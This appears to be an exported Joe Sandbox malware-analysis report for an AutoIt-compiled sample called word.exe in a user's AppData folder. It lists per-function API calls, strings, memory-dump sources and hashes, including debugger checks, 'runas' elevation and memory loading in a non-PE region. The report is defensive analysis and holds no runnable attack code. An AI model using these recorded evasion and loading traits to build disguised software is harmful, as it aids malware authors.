81991->81853 81992->81990 82700 404260 78 API calls 81992->82700 81995 40c3e4 81994->81995 81996 40c42c 81994->81996 81997 40c3f0 81995->81997 81998 42a475 81995->81998 81999 42a422 81996->81999 82000 40c435 81996->82000 82001 4042f0 77 API calls 81997->82001 82705 453155 77 API calls 81998->82705 82002 42a427 81999->82002 82003 42a445 81999->82003 82004 40c441 82000->82004 82005 42a455 82000->82005 82011 40c3fb 82001->82011 82002->82011 82702 453155 77 API calls 82002->82702 82703 453155 77 API calls 82003->82703 82006 4042f0 77 API calls 82004->82006 82704 453155 77 API calls 82005->82704 82006->82011 82011->81863 82013 401a90 82012->82013 82014 401a77 82012->82014 82015 4021e0 77 API calls 82013->82015 82016 401a8d 82014->82016 82706 404080 77 API calls _memcpy_s 82014->82706 82017 401a9c 82015->82017 
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH$4RH
• API String ID: 1143807570-2085553193
• Opcode ID: ca5efaba4490574011d478febeb3435d410ff67b3515fcc5ed7fd1e1b79fd58d
• Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
• Opcode Fuzzy Hash: ca5efaba4490574011d478febeb3435d410ff67b3515fcc5ed7fd1e1b79fd58d
• Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                            • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\word.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                              • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 0040D7D6
                                                                            • MessageBoxA.USER32 ref: 00431AAB
                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00431B0E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00431B3F
                                                                            • GetForegroundWindow.USER32 ref: 00431B8B
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                              • Part of subcall function 004101F0: GetSysColorBrush.USER32 ref: 004101F9
                                                                              • Part of subcall function 004101F0: LoadCursorW.USER32 ref: 00410209
                                                                              • Part of subcall function 004101F0: LoadIconW.USER32 ref: 0041021F
                                                                              • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410232
                                                                              • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410245
                                                                              • Part of subcall function 004101F0: LoadImageW.USER32 ref: 0041026A
                                                                              • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 00410415
                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 0041043E
                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                              • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                              • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                            • String ID: @GH$@GH$C:\Users\user\AppData\Roaming\word.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                            • API String ID: 2493088469-3974260756
                                                                            • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                            • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                            • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                            • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                            Control-flow Graph (graph for the function whose entry block is 0040E470; the rendered graph image with its Executed / Not Executed legend is not reproduced in this text export)
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32 ref: 0040E495
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                            • GetNativeSystemInfo.KERNEL32(?,?), ref: 0040E5D3
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                            • String ID: pMH
                                                                            • API String ID: 2923339712-2522892712
                                                                            • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                            • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                            • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                            • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 0040EB7B
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                            • API String ID: 2574300362-3542929980
                                                                            • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                            • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                            • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                            • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                            • __wsplitpath.LIBCMT ref: 00410C61
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcsncat.LIBCMT ref: 00410C78
                                                                            • __wmakepath.LIBCMT ref: 00410C94
                                                                              • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • _wcscpy.LIBCMT ref: 00410CCC
                                                                            • RegOpenKeyExW.KERNEL32 ref: 00410CE9
                                                                            • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                            • _wcscat.LIBCMT ref: 00429C43
                                                                            • _wcslen.LIBCMT ref: 00429C55
                                                                            • _wcslen.LIBCMT ref: 00429C66
                                                                            • _wcscat.LIBCMT ref: 00429C80
                                                                            • _wcsncpy.LIBCMT ref: 00429CC0
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: 8+$8+$Include$Software\AutoIt v3\AutoIt$\$d+$+
                                                                            • API String ID: 1004883554-1136608971
                                                                            • Opcode ID: f84f773e5c1f596ad2c6b40a9b7963d16100886af7a674061cbd7d72c3873958
                                                                            • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                            • Opcode Fuzzy Hash: f84f773e5c1f596ad2c6b40a9b7963d16100886af7a674061cbd7d72c3873958
                                                                            • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                            • String ID: FILE
                                                                            • API String ID: 3888824918-3121273764
                                                                            • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                            • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                            • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                            • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32 ref: 004101F9
                                                                            • LoadCursorW.USER32 ref: 00410209
                                                                            • LoadIconW.USER32 ref: 0041021F
                                                                            • LoadIconW.USER32 ref: 00410232
                                                                            • LoadIconW.USER32 ref: 00410245
                                                                            • LoadImageW.USER32 ref: 0041026A
                                                                            • RegisterClassExW.USER32 ref: 004102C6
                                                                              • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                              • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                              • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                              • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                              • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                              • Part of subcall function 004102F0: LoadIconW.USER32 ref: 004103B1
                                                                              • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A5B930,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$PGH
                                                                            • API String ID: 423443420-3673556320
                                                                            • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                            • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                            • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                            • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _fseek.LIBCMT ref: 004525DA
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                            • __fread_nolock.LIBCMT ref: 00452618
                                                                            • __fread_nolock.LIBCMT ref: 00452629
                                                                            • __fread_nolock.LIBCMT ref: 00452644
                                                                            • __fread_nolock.LIBCMT ref: 00452661
                                                                            • _fseek.LIBCMT ref: 0045267D
                                                                            • _malloc.LIBCMT ref: 00452689
                                                                            • _malloc.LIBCMT ref: 00452696
                                                                            • __fread_nolock.LIBCMT ref: 004526A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1911931848-0
                                                                            • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                            • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                            • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                            • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 40f450; basic blocks 40f450–40f57a and 429361–4293c3; calls subroutines 425210, 413990, 410f70, 4151b0, 41557c and 4151d0.
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_fseek_strcat
                                                                            • String ID: AU3!$EA06
                                                                            • API String ID: 3818483258-2658333250
                                                                            • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                            • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                            • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                            • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 410130; basic blocks 410130–4101ee and 42944f–429459; calls subroutine 411691 and the APIs SHGetMalloc, SHGetDesktopFolder and SHGetPathFromIDListW.
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                            • String ID: C:\Users\user\AppData\Roaming\word.exe
                                                                            • API String ID: 192938534-622732448
                                                                            • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                            • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                            • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                            • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 3a45778 (non-PE memory region); basic blocks 3a45778–3a45a7a; calls subroutines 3a43178, 3a46688, 3a468d8 and 3a466e8 and the APIs CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree.
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03A45849
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03A45A6F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3a43000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                            • Instruction ID: 85bd6e612ebfdff27f4d909da6ee13d0ff17d62f3f9cb48c1165475d2d2aad40
                                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                            • Instruction Fuzzy Hash: C8A10874E00209EBDF14CFA4C998BEEB7B5FF89314F24819AE505BB281D7759A40CB64

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 414f10; basic blocks 414f10–415118; calls subroutines 417f23, 417ebb, 4131f0, 41e6b1, 41453a, 41ed9e and 41ee9b.
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 3886058894-0
                                                                            • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                            • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                            • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                            • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 401be0; basic blocks 401be0–401ce3 and 42a9a0–42aa04; calls subroutines 4013a0, 4021e0, 40df50, 40d3b0, 437a81, 4131f0, 41326a, 411691 and 402620 and the APIs LoadStringW and Shell_NotifyIconW.
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • _memset.LIBCMT ref: 00401C62
                                                                            • _wcsncpy.LIBCMT ref: 00401CA1
                                                                            • _wcscpy.LIBCMT ref: 00401CBD
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                            • String ID: Line:
                                                                            • API String ID: 1620655955-1585850449
                                                                            • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                            • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                            • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                            • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 4103e0; single basic block 4103e0–410461; calls CreateWindowExW twice and ShowWindow twice.
                                                                            APIs
                                                                            • CreateWindowExW.USER32 ref: 00410415
                                                                            • CreateWindowExW.USER32 ref: 0041043E
                                                                            • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                            • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
